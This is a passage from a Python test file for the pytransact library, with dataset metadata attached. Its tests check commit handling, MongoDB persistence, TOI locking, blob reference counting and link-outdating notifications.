bval1.references == {cmt._id}\n assert bval2.references == {cmt._id}\n assert bval3.references == {cmt._id}\n\n def test_createCommit_error(self):\n cctx = self.newcontext()\n toi1 = blm.testcommit.Test(name=['foo'])\n toi2 = blm.testcommit.Test(name=['bar'])\n toi3 = blm.testcommit.Test(name=['baz'])\n toi1._orgAttrData = { 'name': ['apa'] }\n\n cctx.changedTois = { toi1.id[0]: toi1 }\n cctx.newTois = { toi2.id[0]: toi2 }\n cctx.deletedTois = {toi3.id[0]: toi3}\n cctx.indexData = [(toi1.id[0], {'toid': toi1.id[0],\n 'data': ['foo', 'bar']})]\n\n ops = []\n error = ClientError()\n commit = cctx.createCommit(ops, [['result']], error=error)\n assert commit.newTois == []\n assert commit.changedTois == []\n assert commit.deletedTois == []\n assert commit.indexData == []\n assert commit.results == []\n assert commit.error is error\n\n def test_createCommit_bad_doc(self):\n cctx = self.newcontext()\n toi1 = blm.testcommit.Test(name=['foo'*8*1024*1024]) # 24MB\n cctx.newTois = { toi1.id[0]: toi1 }\n\n ops = [commit.CallBlm('foo', 'bar', [])]\n\n cmt = cctx.createCommit(ops, [['result']], interested='interested')\n # Will fail when commit is saved\n\n\n def _commit(self, interested=None, _id=ObjectId(), operations=[],\n result=[['result'], 42], error=None):\n toiToDelete = blm.testcommit.Test(name=['baz'])\n toiToChange = blm.testcommit.Test(name=['foo'])\n cctx = self.newcontext()\n toiToCreate = blm.testcommit.Test(name=['bar'])\n\n new = DiffTOI()\n new.setToi(toiToCreate)\n\n changed = DiffTOI()\n changed.setAttrDiff(toiToChange.__class__, toiToChange.id[0],\n toiToChange._attrData, {'name': ['apa']})\n doc = {'_id': _id,\n 'newTois': [new],\n 'changedTois': [changed],\n 'deletedTois': [toiToDelete.id[0]],\n 'operations': operations,\n 'addedBlobVals': {},\n 'deletedBlobVals': {},\n 'results': result,\n 'error': error,\n 'indexData': [],\n 'handled_by': cctx.id,\n 'user': cctx.user,\n 'interested': interested}\n commitId = mongo.insert(self.database.commits, doc)\n assert commitId\n self.sync()\n ContextBroker().popContext()\n\n assert self.find_one({'_id': toiToChange.id[0]})['name'] == ['foo']\n assert not self.find_one({'_id': toiToCreate.id[0]})\n assert self.find_one({'_id': toiToDelete.id[0]})\n cctx.commit(commit.Commit.fromquery(self.database, {'_id': commitId}))\n self.sync()\n\n assert self.find_one({'_id': toiToChange.id[0]})['name'] == ['apa']\n assert self.find_one({'_id': toiToCreate.id[0]})\n assert not self.find_one({'_id': toiToDelete.id[0]})\n return commitId\n\n def test_commit_without_interest_successful(self):\n commitId = self._commit()\n assert not mongo.find_one(self.database.commits, {'_id': commitId})\n\n def test_commit_with_interest_successful(self):\n commitId = self._commit(interested=[1, 2])\n commit = mongo.find_one(self.database.commits, {'_id': commitId})\n assert commit['handled_by'] == commit['interested'] == [1, 2]\n assert commit['state'] == 'done'\n assert commit['results'] == [['result'], 42]\n\n def test_commit_with_interest_error(self):\n commitId = self._commit(interested=[1, 2], result=[None], error='error')\n commit = mongo.find_one(self.database.commits, {'_id': commitId})\n assert commit['handled_by'] == commit['interested'] == [1, 2]\n assert commit['state'] == 'done'\n assert commit['results'] == [None]\n assert commit['error'] == 'error'\n\n def test_commit_blobval_reference_handling(self):\n commitId = ObjectId()\n bv1 = BlobVal('foo')\n bv2 = BlobVal('bar')\n bv3 = BlobVal('baz')\n bv1.large_blob = bv2.large_blob = bv3.large_blob = 2\n bv1.addref(commitId)\n bv3.addref(commitId)\n\n op = commit.CallToi(ObjectId(), 'foo', [[bv1, bv3]])\n result = [[bv2, bv3, 'baz']]\n commitId = self._commit(interested=[1, 2], _id=commitId, operations=[op],\n result=result)\n cmt = mongo.find_one(self.database.commits, {'_id': commitId})\n\n py.test.raises(gridfs.NoFile, bv1.gridfs(self.database).get, bv1.value._id)\n assert cmt['results'][0][0].references == {commitId}\n assert cmt['results'][0][1].references == {commitId}\n\n def test_commit_with_mongodb_error(self):\n self.set_primary()\n self.database.previous_error = lambda : {'err': 'ohnoes!', 'code': 123}\n err = py.test.raises(OperationFailure, self._commit)\n assert err.value.args[0] == 'ohnoes!'\n assert err.value.code == 123\n\n def test_commit_already_in_progress(self):\n toi = blm.testcommit.Test(name=['foo'])\n mongo.find_and_modify(self.database.tois, {'_id': toi.id[0]},\n {'$set': {'_handled_by': ObjectId()}})\n self.sync()\n cctx = self.newcontext()\n toi, = blm.testcommit.Test._query(name=['foo']).run()\n toi(name=['bar'])\n py.test.raises(commit.ToisLocked, cctx.commit,\n cctx.createCommit([], []))\n\n def test_rerun_conflicting_commit(self):\n toi = blm.testcommit.Test(name=['foo'])\n self.sync()\n assert self.find_one({'_id': toi.id[0]})\n cctx = self.newcontext()\n op = commit.CallToi(toi.id[0], 'add', [['bar']])\n commitId = cctx.runCommit([op], processCommits=False)\n ContextBroker().popContext()\n toi.extra = ['conflict']\n self.sync()\n\n _rerunCommit = cctx.rerunCommit\n def rerunCommit(*args, **kw):\n db_toi_data = self.find_one({'_id': toi.id[0]})\n assert db_toi_data.get('_terms', []) == []\n return _rerunCommit(*args, **kw)\n cctx.rerunCommit = rerunCommit\n\n cctx.processCommits(commitId)\n self.sync()\n\n cctx = self.newcontext()\n toi, = blm.testcommit.Test._query().run()\n assert toi.extra == ['conflict', 'bar']\n\n db_toi_data = self.find_one({'_id': toi.id[0]})\n py.test.skip('full text index disabled for now')\n assert db_toi_data['_terms'] == [{'toid': toi.id[0],\n 'data': ['bar', 'conflict']}]\n\n def test_rerun_locked_tois_commit_self(self):\n toi = blm.testcommit.Test(name=['foo'])\n cctx = self.newcontext()\n op = commit.CallToi(toi.id[0], 'add', [['bar']])\n commitId = cctx.runCommit([op], processCommits=False)\n\n # toi is locked by a commit already, abuse the fact that\n # locked toi check does not care about who has locked it, so\n # using commit context's own ID which will be removed by\n # unlocking\n mongo.find_and_modify(self.database.tois, {'_id': toi.id[0]},\n {'$set': {'_handled_by': cctx.id}})\n\n cctx.processCommits(commitId)\n self.sync()\n\n cctx = self.newcontext()\n toi, = blm.testcommit.Test._query().run()\n assert toi.extra == ['bar']\n\n def test_mark_failed_commits(self):\n cctx = self.newcontext()\n def commit(commit):\n raise RuntimeError('everything broke')\n cctx.commit = commit\n commit = cctx.runCommit([])\n commit = self.find_one({'_id': commit._id}, self.database.commits)\n assert commit['state'] == 'failed'\n assert 'everything broke' in commit['traceback']\n error = commit['error']\n assert isinstance(error, BlError)\n\n def test_failure_timeout_on_toislocked(self):\n cctx = self.newcontext()\n def ct(c):\n raise commit.ToisLocked()\n cctx.commit = ct\n py.test.raises(commit.Timeout, cctx.runCommit, [])\n\n def test_failure_timeout_on_conflict(self):\n cctx = self.newcontext()\n def ct(c):\n raise commit.CommitConflict('toi', 'diff')\n cctx.commit = ct\n py.test.raises(commit.Timeout, cctx.runCommit, [])\n\n def test_saveIndexData(self):\n py.test.skip('full text index disabled for now')\n cctx = self.newcontext()\n toid = ObjectId()\n child1 = ObjectId()\n child2 = ObjectId()\n mongo.insert(self.database.tois, {'_id': toid})\n\n get_stored = lambda : sorted(self.find_one({'_id': toid})['_terms'])\n\n indexData = [(toid, [{'toid': toid, 'data': ['foo']}])]\n expect = [{'toid': toid, 'data': ['foo']}]\n cctx.saveIndexData(indexData)\n assert get_stored() == expect\n\n indexData = [(toid, [{'toid': toid, 'data': ['foo']},\n {'toid': child1, 'data': ['bar']}])]\n expect = sorted([{'toid': toid, 'data': ['foo']},\n {'toid': child1, 'data': ['bar']}])\n cctx.saveIndexData(indexData)\n assert get_stored() == expect\n\n indexData = [(toid, [{'toid': child1, 'data': ['bar', 'baz']},\n {'toid': child2, 'data': ['qux']}])]\n expect = sorted([{'toid': toid, 'data': ['foo']},\n {'toid': child1, 'data': ['bar', 'baz']},\n {'toid': child2, 'data': ['qux']}])\n cctx.saveIndexData(indexData)\n assert get_stored() == expect\n\n\nclass TestNotifyChanges(BaseCommitContextTests):\n\n def setup_method(self, method):\n super(TestNotifyChanges, self).setup_method(method)\n self.time = Time()\n\n def teardown_method(self, method):\n super(TestNotifyChanges, self).teardown_method(method)\n self.time.restore()\n\n def test_requests(self):\n toid1 = ObjectId()\n toid2 = ObjectId()\n toid3 = ObjectId()\n\n link1 = mongo.insert(self.database.links,\n {'type': 'LinkRequest', 'params': { 'toid': toid1}})\n link2 = mongo.insert(self.database.links,\n {'type': 'LinkRequest', 'params': { 'toid': toid2}})\n link3 = mongo.insert(self.database.links,\n {'type': 'LinkRequest', 'params': { 'toid': toid3}})\n\n cctx = self.newcontext()\n diff = DiffTOI()\n diff.toid = toid1\n diff.diffAttrs['allowRead'] = [Fake(id=[ObjectId()])]\n cid1, cid2 = ObjectId(), ObjectId()\n commits = [commit.Commit.fromdoc(self.database,\n {'_id': cid1,\n 'changedTois': [diff],\n 'deletedTois': [],\n 'newTois': []}),\n commit.Commit.fromdoc(self.database,\n {'_id': cid2,\n 'changedTois': [],\n 'deletedTois': [toid2],\n 'newTois': []})]\n cctx.notifyChanges(commits)\n self.sync()\n\n outdated = self.find({'outdatedBy': {'$ne': None}}, self.database.links)\n assert outdated.count() == 2\n outdated = list(outdated)\n assert {link['_id'] for link in outdated} == {link1, link2}\n assert outdated[0]['outdatedBy'] == cid2\n assert outdated[1]['outdatedBy'] == cid2\n\n def test_sorted_query_by_allow_read(self):\n user1 = blm.fundamental.AccessHolder()\n user2 = blm.fundamental.AccessHolder()\n toi1 = blm.testcommit.Test(name=['test'], allowRead=[user1])\n toi2 = blm.testcommit.Test(name=['test'], allowRead=[user2])\n toi3 = blm.testcommit.Test(name=['test'])\n self.commit()\n\n link1 = mongo.insert(self.database.links,\n {'type': 'LinkSortedQuery', 'allowRead': user1.id,\n 'timestamp': self.time.now, 'ancient': False})\n link2 = mongo.insert(self.database.links,\n {'type': 'LinkSortedQuery', 'allowRead': user2.id,\n 'timestamp': self.time.now, 'ancient': False})\n link3 = mongo.insert(self.database.links,\n {'type': 'LinkSortedQuery',\n 'state': {'query': [{'id': toi3.id[0]}]},\n 'allowRead': [ObjectId()],\n 'timestamp': self.time.now, 'ancient': False})\n link4 = mongo.insert(self.database.links,\n {'type': 'LinkSortedQuery',\n 'ancient': False,\n 'allowRead': user1.id,\n 'outdatedToids': [ObjectId()],\n 'timestamp': self.time.now -\n commit.CommitContext.link_old_age - 1})\n\n cctx = self.newcontext()\n diff = DiffTOI()\n diff.toid = toi1.id[0]\n cid = ObjectId()\n commits = [commit.Commit.fromdoc(self.database,\n {'_id': cid,\n 'changedTois': [diff],\n 'deletedTois': toi3.id,\n 'newTois': []})]\n cctx.notifyChanges(commits)\n self.sync()\n\n outdated = self.find({'outdatedBy': {'$ne': None}}, self.database.links)\n outdated = dict((link['_id'], link) for link in outdated)\n assert len(outdated) == 3\n assert set(outdated) == {link1, link3, link4}\n\n assert outdated[link1]['outdatedBy'] == cid\n assert outdated[link3]['outdatedBy'] == cid\n assert outdated[link4]['outdatedBy'] == cid\n assert set(outdated[link1]['outdatedToids']) == {toi1.id[0], toi3.id[0]}\n assert set(outdated[link3]['outdatedToids']) == {toi1.id[0], toi3.id[0]}\n assert len(outdated[link4]['outdatedToids']) == 0\n\nclass TestChangeToi(BaseCommitContextTests):\n\n def test_simple(self):\n toi = blm.testcommit.Test(name=['foo'])\n self.commit()\n with self.newcontext() as cctx:\n toi = blm.testcommit.Test._query(id=toi.id).run()[0]\n op = commit.ChangeToi(toi, {'name': ['bar']})\n op.operate(cctx)\n\n assert toi.name == ['bar']\n\n def test_commit_deleted(self):\n toi = blm.testcommit.Test()\n self.commit()\n\n ctx1 = commit.CommitContext(self.database)\n ctx1.setMayChange(True)\n with ctx1:\n toi1 = blm.testcommit.Test._query(id=toi.id).run()[0]\n op = commit.ChangeToi(toi1, {'name': ['bar']})\n\n interested = ObjectId()\n c = ctx1.runCommit([op], interested=interested, processCommits=False)\n\n toi._delete()\n self.commit()\n\n ctx1.processCommits(c)\n\n result, error = commit.wait_for_commit(self.database, interested)\n assert error\n\n\nclass TestDeleteToi(BaseCommitContextTests):\n\n def test_simple(self):\n toi = blm.testcommit.Test(name=['foo'])\n self.commit()\n with self.newcontext() as cctx:\n toi = blm.testcommit.Test._query(id=toi.id).run()[0]\n op = commit.DeleteToi(toi)\n op.operate(cctx)\n\n assert toi._deleted\n\n def test_commit_deleted(self):\n toi = blm.testcommit.Test()\n self.commit()\n\n ctx1 = self.newcontext()\n with ctx1:\n toi1 = blm.testcommit.Test._query(id=toi.id).run()[0]\n op = commit.DeleteToi(toi1)\n\n toi._delete()\n self.commit()\n\n interested = ObjectId()\n ctx1.runCommit([op], interested=interested)\n\n result, error = commit.wait_for_commit(self.database, interested)\n assert not error # It was already gone, so we are ok.\n\n\nclass TestOperations(BaseCommitContextTests):\n\n def test_CreateToi(self):\n toid = ObjectId()\n op = commit.CreateToi('testcommit.Test', toid, {'name': ['test']})\n cctx = self.newcontext()\n toi = op.operate(cctx)\n assert not toi._phantom\n\n def test_CallToi_simple(self):\n toi = blm.testcommit.Test(name=['test'])\n self.sync()\n cctx = self.newcontext()\n\n op = commit.CallToi(toi.id[0], 'simple', [['bar']])\n commitDoc = cctx.runCommit([op])\n result = commitDoc.results\n\n assert result == [['test', 'bar']]\n\n def test_CallBlm_simple(self):\n cctx = self.newcontext()\n\n op = commit.CallBlm('testcommit', 'simple', [['bar']])\n commitDoc = cctx.runCommit([op])\n result = commitDoc.results\n\n assert result == [['foo', 'bar']]\n\n def test_CallBlm_write(self):\n user = blm.fundamental.AccessHolder()\n toi = blm.testcommit.Test(name=['foo'], allowRead=[user])\n self.commit()\n self.sync()\n cctx = self.newcontext(user=user)\n\n op = commit.CallBlm('testcommit', 'write', [[toi], ['bar']])\n cmt = cctx.runCommit([op])\n # xxx find a better way of testing this\n assert 'AttrPermError' in repr(cmt.error)\n\n def test_CallBlm_non_existant_toiref(self):\n op = commit.CallBlm('testcommit', 'write', [[ObjectId()], ['bar']])\n cctx = self.newcontext()\n print(py.test.raises(ClientError, op.operate, cctx))\n\n def test_BlobVals(self):\n val = BlobVal('foo')\n op = commit.CallToi(ObjectId(), 'foo', [[val], ['apa']])\n assert set(op.blobVals()) == {val}\n\n op = commit.CallBlm('theblm', 'foo', [[val], ['apa']])\n assert set(op.blobVals()) == {val}\n\n def test_serialization(self):\n op = commit.DeleteToi(None)\n data = {'op': op}\n son = bson.BSON.encode(data)\n decoded = son.decode()\n assert decoded == data\n\nclass TestCommitObject(BaseCommitContextTests):\n def test_attributes(self):\n c = commit.Commit()\n assert isinstance(c._id, ObjectId)\n assert c.user == None\n assert c.interested == None\n assert c.handled_by == None\n assert c.operations == []\n assert c.newTois == []\n assert c.changedTois == []\n assert c.deletedTois == []\n assert c.addedBlobVals == {}\n assert c.deletedBlobVals == {}\n assert c.indexData == []\n assert c.results == []\n assert c.error == None\n assert c.traceback == None\n assert c.state == 'new'\n assert c.generation == 0\n\n def test_get_doc(self):\n c = commit.Commit()\n result = c.get_doc()\n expected = {\n '_id': c._id,\n 'user': None,\n 'interested': None,\n 'error': None,\n 'traceback': None,\n 'state': 'new',\n 'generation': 0\n }\n assert result == expected\n\n def test_save(self):\n c = commit.Commit()\n c.save(self.database)\n self.sync()\n result = self.find_one({'_id': c._id}, self.database.commits)\n expect = c.get_doc()\n assert result == expect\n\n def test_save_gridfs(self):\n resstr = 'random string'*24*2**10\n c1 = commit.Commit(results = [resstr])\n c1.save(self.database)\n self.sync()\n result = self.find_one({'_id': c1._id}, self.database.commits)\n gridfile = result['_griddata']\n assert isinstance(gridfile, BlobVal)\n assert isinstance(gridfile.value, gridfs.GridOut)\n c2 = commit.Commit.fromdoc(self.database, result)\n assert c2.results == [resstr]\n\n def test_delete(self):\n class Op(object):\n def __init__(self, blobs):\n self.blobs = blobs\n\n def blobVals(self):\n return self.blobs\n\n c = commit.Commit()\n added = BlobVal('added')\n deleted = BlobVal('deleted')\n opval = BlobVal('op')\n added.addref(c._id)\n deleted.addref(c._id)\n opval.addref(c._id)\n result = BlobVal('result')\n result.addref(c._id)\n\n ops = [ Op([opval]) ]\n\n c.results = [ result ]\n c.addedBlobVals = { 'a' : [added] }\n c.deletedBlobVals = { 'b' : [deleted] }\n c.save(self.database)\n self.sync()\n\n assert self.find_one({'_id': c._id}, self.database.commits)\n c.operations = ops # Not BSONable\n c.delete(self.database)\n self.sync()\n assert not self.find_one({'_id': c._id}, self.database.commits)\n assert added.references == set()\n assert deleted.references == set()\n assert ops[0].blobs[0].references == set()\n assert result.references == set()\n\n def test_delete_gridfs(self):\n c = commit.Commit(results=['foo bar baz'*24*2**10])\n doc = c.get_doc()\n blobval = doc['_griddata']\n c.save(self.database)\n self.sync()\n assert self.find_one({'_id': c._id}, self.database.commits)\n assert self.find_one({'metadata.references.value': c._id},\n self.database.blobvals.files)\n\n c.delete(self.database)\n self.sync()\n\n assert not self.find_one({'_id': c._id}, self.database.commits)\n assert not self.find_one({'metadata.references.value': c._id},\n self.database.blobvals.files)\n # Make sure that ALL generated blobvals get decref()'d\n assert blobval.references == set()\n\n\n def test_unhandle(self):\n handler = ObjectId()\n c = commit.Commit(handled_by=handler)\n c.unhandle(self.database, handler)\n self.sync()\n\n cdoc = self.find_one({'_id': c._id}, self.database.commits)\n assert 'handled_by' not in cdoc\n\n def test_unhandle_handled(self):\n handler = ObjectId()\n c1 = commit.Commit(handled_by=handler)\n c1.save(self.database)\n c1.unhandle_handled(self.database, c1._id, handler)\n self.sync()\n assert self.find_one({'_id': c1._id}, self.database.commits)\n\n c2 = commit.Commit(handled_by=handler)\n # c1 is intentional. Ensure c2 isn't saved in any form\n c1.unhandle_handled(self.database, c2._id, handler)\n c2.unhandle_handled(self.database, c2._id, handler)\n self.sync()\n assert not self.find_one({'_id': c2._id}, self.database.commits)\n\n def test_handlers_running(self):\n self.set_primary()\n handler = ObjectId()\n c = commit.Commit(handled_by=handler)\n c.save(self.database)\n\n assert c.handlers_running(self.database)\n c.unhandle(self.database, handler)\n\n assert not c.handlers_running(self.database)\n\n def test_handle(self):\n handler = ObjectId()\n c1 = commit.Commit()\n c1.save(self.database)\n expected = c1.get_doc()\n expected['handled_by'] = handler\n\n c2 = commit.Commit.handle(self.database, handler)\n assert c2.get_doc() == expected\n\n c3 = commit.Commit.handle(self.database, handler)\n assert c3 is None\n\n def test_done(self):\n c = commit.Commit(interested='interested')\n result = BlobVal('result')\n c.results = [result]\n c.newTois = {'a': 'b'}\n c.done(self.database)\n self.sync()\n\n assert result.references == {c._id}\n result = self.find_one({'_id': c._id}, self.database.commits)\n expect = {'_id': c._id,\n 'error': None,\n 'handled_by': 'interested',\n 'interested': 'interested',\n 'results': c.results,\n 'state': 'done'}\n assert result == expect\n\n def test_done_not_interested(self):\n c = commit.Commit()\n result = BlobVal('result')\n c.results = [result]\n c.newTois = {'a': 'b'}\n c.done(self.database)\n\n assert result.references == set()\n result = self.find_one({'_id': c._id}, self.database.commits)\n assert not result\n\n def test_fromdoc(self):\n _id = ObjectId()\n c = commit.Commit.fromdoc(self.database, {'_id': _id,\n 'results': ['foo']})\n assert c._id == _id\n assert c.results == ['foo']\n\n def test_fromquery(self):\n handler = ObjectId()\n c1 = commit.Commit(handled_by=handler)\n c1.save(self.database)\n self.sync()\n c2 = commit.Commit.fromquery(self.database, {'handled_by': handler})\n assert c1._id == c2._id\n", "repo_name": "jacob22/pytransact", "sub_path": "pytransact/test/test_commit.py", "file_name": "test_commit.py", "file_ext": "py", "file_size_in_byte": 46541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "blm.addBlmPath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 19, "usage_type": "call"}, {"api_name": "pytransact.commit.log.setLevel", "line_number": 20, "usage_type": "call"}, {"api_name": "pytransact.commit.log", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 20, "usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 20, "usage_type": "attribute"}, {"api_name": "blm.removeBlmPath", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "blm.clear", "line_number": 24, "usage_type": "call"}, {"api_name": "pytransact.testsupport.ContextTests", "line_number": 27, "usage_type": "name"}, {"api_name": "pytransact.testsupport.RuntimeContext", "line_number": 31, "usage_type": "call"}, {"api_name": "blm.fundamental.AccessHolder", "line_number": 32, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 38, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 38, "usage_type": "name"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 40, "usage_type": "call"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 44, "usage_type": "call"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 46, "usage_type": "call"}, {"api_name": "pymongo.ReadPreference", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pytransact.mongo.find", "line_number": 56, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 56, "usage_type": "name"}, {"api_name": "pytransact.mongo.find_one", "line_number": 60, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 60, "usage_type": "name"}, {"api_name": "pytransact.commit.wait_for_commit", "line_number": 67, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 67, "usage_type": "name"}, {"api_name": "py.test.raises", "line_number": 73, "usage_type": "call"}, {"api_name": "py.test", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pytransact.commit.Timeout", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 73, "usage_type": "name"}, {"api_name": "pytransact.commit.wait_for_commit", "line_number": 73, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 78, "usage_type": "call"}, {"api_name": "py.test", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pytransact.commit.wait_for_commit", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 78, "usage_type": "name"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 83, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 83, "usage_type": "name"}, {"api_name": "blm.testcommit", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 94, "usage_type": "call"}, {"api_name": "blm.fundamental.AccessHolder", "line_number": 99, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 99, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 108, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 113, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 113, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 118, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 128, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 135, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 135, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 140, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 152, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 153, "usage_type": "name"}, {"api_name": "pytransact.commit.state", "line_number": 154, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 154, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 160, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 160, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 165, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 172, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 181, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 181, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 185, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 185, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 190, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 190, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 191, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 191, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 194, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 194, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 195, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 195, "usage_type": "attribute"}, {"api_name": "blm.fundamental.AccessHolder._query", "line_number": 202, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 202, "usage_type": "attribute"}, {"api_name": "blm.fundamental", "line_number": 203, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 206, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 206, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 207, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 213, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 213, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 216, "usage_type": "call"}, {"api_name": "py.test", "line_number": 216, "usage_type": "attribute"}, {"api_name": "py.test.skip", "line_number": 219, "usage_type": "call"}, {"api_name": "py.test", "line_number": 219, "usage_type": "attribute"}, {"api_name": "blm.testcommit.RestTest", "line_number": 224, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 224, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 228, "usage_type": "call"}, {"api_name": "py.test", "line_number": 228, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 230, "usage_type": "call"}, {"api_name": "py.test", "line_number": 230, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 234, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 234, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 237, "usage_type": "call"}, {"api_name": "py.test", "line_number": 237, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 238, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 240, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 240, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 241, "usage_type": "call"}, {"api_name": "py.test", "line_number": 241, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 242, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 245, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 245, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 248, "usage_type": "call"}, {"api_name": "py.test", "line_number": 248, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 249, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 251, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 251, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 252, "usage_type": "call"}, {"api_name": "py.test", "line_number": 252, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 253, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 256, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 256, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 260, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 264, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 264, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 268, "usage_type": "call"}, {"api_name": "py.test", "line_number": 268, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 269, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 275, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 275, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 276, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 276, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 277, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 277, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 281, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 286, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 286, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 290, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 290, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 292, "usage_type": "call"}, {"api_name": "py.test", "line_number": 292, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 302, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 302, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 304, "usage_type": "call"}, {"api_name": "py.test", "line_number": 304, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 314, 